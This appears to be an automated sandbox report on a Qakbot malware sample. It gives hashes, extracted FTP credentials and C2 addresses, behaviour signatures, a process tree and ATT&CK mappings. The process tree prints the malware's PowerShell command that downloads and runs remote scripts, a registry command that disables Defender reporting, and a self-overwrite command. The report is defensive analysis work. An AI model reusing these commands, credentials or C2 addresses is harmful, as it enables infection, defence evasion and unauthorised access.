Analysis

  • max time kernel
    144s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2024 02:19

General

  • Target

    b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe

  • Size

    536KB

  • MD5

    4d9add7f38d2bfcfbc3d4bcf3f44e47d

  • SHA1

    c9198de89705f6983a50c445ed1866a24cc9c846

  • SHA256

    b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba

  • SHA512

    06e86fdfd21bfc8b91f1489bda9e17e27e5bc6855a4f91753353d4d8fbcb645ccef8b70e92eb2e5ed7edad55e87fe75e7a597310e464354313d01a8a6a068d32

  • SSDEEP

    6144:K3puL8eujbUcqbRI30RYAimlQY1KdZwzlW+2M0WybVGH/Itkug/i03s/nZYIVQV2:R8eSbcRYAplQYU3YlWOdT/pbqUVxg

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1

ps1.dropper

https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

Family

qakbot

Version

322.358

Campaign

1524770894

Credentials

  • Protocol:
    ftp
  • Host:
    37.60.244.211
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    4AsEzIaMwi2d

  • Protocol:
    ftp
  • Host:
    198.38.77.162
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    kJm6DKVPfyiv

  • Protocol:
    ftp
  • Host:
    61.221.12.26
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    346HZGCMlwecz9S

  • Protocol:
    ftp
  • Host:
    67.222.137.18
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    p4a8k6fE1FtA3pR

  • Protocol:
    ftp
  • Host:
    107.6.152.61
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    RoP4Af0RKAAQ74V
C2

65.40.207.151:995

98.242.248.219:443

96.248.7.111:443

24.240.178.42:995

67.141.64.98:443

12.166.108.82:995

47.223.79.196:993

73.48.132.91:443

24.209.130.208:443

216.16.14.19:443

173.81.42.136:443

209.213.24.194:443

69.129.91.38:443

185.219.83.73:443

70.182.79.66:443

68.49.120.179:443

73.222.54.231:443

66.189.228.49:995

98.190.205.8:443

216.21.168.27:32101

Signatures

  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:2816
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:3160
  • C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:3224
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    PID:3528
    • C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
      "C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe"
      2⤵
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
        "C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe" /C
        3⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        PID:2096
      • C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:4848
        • C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx.exe" /C
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          PID:4044
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          4⤵
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4248
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        3⤵
          PID:4392
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\ieivwcfsfngbnnpyywldidctj.txt'"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5100
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:980
          • C:\Windows\SysWOW64\PING.EXE
            ping.exe -n 6 127.0.0.1
            4⤵
            • Runs ping.exe
            PID:3352
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3696
    • C:\Windows\system32\DllHost.exe
      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
      1⤵
        PID:3884
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3988
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4056
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
          PID:3808
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4180
        • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
          "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
          1⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4908
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4668
        • C:\Windows\system32\backgroundTaskHost.exe
          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
          1⤵
            PID:2556
          • C:\Windows\System32\RuntimeBroker.exe
            C:\Windows\System32\RuntimeBroker.exe -Embedding
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2224
          • C:\Windows\System32\RuntimeBroker.exe
            C:\Windows\System32\RuntimeBroker.exe -Embedding
            1⤵
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            PID:2380
          • C:\Windows\system32\backgroundTaskHost.exe
            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
            1⤵
              PID:1804
            • C:\Windows\system32\backgroundTaskHost.exe
              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
              1⤵
                PID:2260

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Execution

              Command and Scripting Interpreter

              1
              T1059

              PowerShell

              1
              T1059.001

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Defense Evasion

              Modify Registry

              1
              T1112

              Discovery

              Query Registry

              2
              T1012

              System Information Discovery

              3
              T1082

              Peripheral Device Discovery

              1
              T1120

              Remote System Discovery

              1
              T1018

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cj13j2sm.g52.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmed.dat
                Filesize

                91B

                MD5

                da685d7dfeb7cabfe12ea2acf71680ac

                SHA1

                9385bc99571a50aacc04ce3877dd5d4d3e8618dc

                SHA256

                22a19b3a7372fb0c419cbde0a4d54ba1bf79c755764d0f3a681e05a85fb6519b

                SHA512

                5466837584cae9eaf2e801de6a04751c2d7a8d6e1bb8959a30c1ea185bc4cfefcde046b392762a0fcf0fc106c3a6ac60ca98c653e25a10322038001d3969e83b

              • C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx.exe
                Filesize

                536KB

                MD5

                4d9add7f38d2bfcfbc3d4bcf3f44e47d

                SHA1

                c9198de89705f6983a50c445ed1866a24cc9c846

                SHA256

                b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba

                SHA512

                06e86fdfd21bfc8b91f1489bda9e17e27e5bc6855a4f91753353d4d8fbcb645ccef8b70e92eb2e5ed7edad55e87fe75e7a597310e464354313d01a8a6a068d32

              • C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx32.dll
                Filesize

                357B

                MD5

                80b73f86b54755770057a89cea37f612

                SHA1

                1c524fa8981ae9b4c9d456f2438956d12f9e3aee

                SHA256

                19bdee2a3950279d9f30fb5a8334ec0302b83101e668c6d743edc3b3b27c7db9

                SHA512

                5142124831c161ca6171528c51c52bdb6215fd8c04a2d5db406dc2715d48e9817cbf9e1b4ff73e21e6d5630e1ce2c3cfd1f3246360b15d977f88337a1be3a1b7

              • memory/2096-7-0x0000000000400000-0x0000000000489000-memory.dmp
                Filesize

                548KB

              • memory/2224-87-0x0000000000470000-0x000000000049C000-memory.dmp
                Filesize

                176KB

              • memory/2380-90-0x0000000000640000-0x000000000066C000-memory.dmp
                Filesize

                176KB

              • memory/2816-40-0x00000000008D0000-0x00000000008D1000-memory.dmp
                Filesize

                4KB

              • memory/2816-41-0x0000000000870000-0x000000000089C000-memory.dmp
                Filesize

                176KB

              • memory/3028-2-0x0000000000400000-0x0000000000489000-memory.dmp
                Filesize

                548KB

              • memory/3028-34-0x0000000000400000-0x0000000000489000-memory.dmp
                Filesize

                548KB

              • memory/3028-0-0x0000000000960000-0x0000000000966000-memory.dmp
                Filesize

                24KB

              • memory/3028-49-0x0000000000400000-0x0000000000489000-memory.dmp
                Filesize

                548KB

              • memory/3160-46-0x00000000000C0000-0x00000000000EC000-memory.dmp
                Filesize

                176KB

              • memory/3224-51-0x0000000000E90000-0x0000000000EBC000-memory.dmp
                Filesize

                176KB

              • memory/3528-54-0x0000000002D70000-0x0000000002D9C000-memory.dmp
                Filesize

                176KB

              • memory/3696-57-0x0000000000110000-0x000000000013C000-memory.dmp
                Filesize

                176KB

              • memory/3884-67-0x0000000000BF0000-0x0000000000C1C000-memory.dmp
                Filesize

                176KB

              • memory/3988-69-0x00000000003C0000-0x00000000003EC000-memory.dmp
                Filesize

                176KB

              • memory/4044-35-0x0000000000400000-0x0000000000489000-memory.dmp
                Filesize

                548KB

              • memory/4056-72-0x0000000000F70000-0x0000000000F9C000-memory.dmp
                Filesize

                176KB

              • memory/4180-77-0x00000000005D0000-0x00000000005FC000-memory.dmp
                Filesize

                176KB

              • memory/4248-64-0x0000000002F40000-0x0000000002F6F000-memory.dmp
                Filesize

                188KB

              • memory/4248-37-0x0000000000E90000-0x0000000000EFA000-memory.dmp
                Filesize

                424KB

              • memory/4248-60-0x0000000002F40000-0x0000000002F6F000-memory.dmp
                Filesize

                188KB

              • memory/4248-61-0x0000000000E90000-0x0000000000EFA000-memory.dmp
                Filesize

                424KB

              • memory/4248-62-0x0000000002F40000-0x0000000002F6F000-memory.dmp
                Filesize

                188KB

              • memory/4248-39-0x0000000000E90000-0x0000000000EFA000-memory.dmp
                Filesize

                424KB

              • memory/4248-63-0x0000000002F40000-0x0000000002F6F000-memory.dmp
                Filesize

                188KB

              • memory/4668-83-0x0000000000FF0000-0x000000000101C000-memory.dmp
                Filesize

                176KB

              • memory/4848-36-0x0000000000400000-0x0000000000489000-memory.dmp
                Filesize

                548KB

              • memory/4908-80-0x0000000000BA0000-0x0000000000BCC000-memory.dmp
                Filesize

                176KB

              • memory/5100-48-0x00007FFF46250000-0x00007FFF46D11000-memory.dmp
                Filesize

                10.8MB

              • memory/5100-29-0x00007FFF46250000-0x00007FFF46D11000-memory.dmp
                Filesize

                10.8MB

              • memory/5100-28-0x00007FFF46250000-0x00007FFF46D11000-memory.dmp
                Filesize

                10.8MB

              • memory/5100-18-0x0000013A79D30000-0x0000013A79D52000-memory.dmp
                Filesize

                136KB

              • memory/5100-17-0x00007FFF46253000-0x00007FFF46255000-memory.dmp
                Filesize

                8KB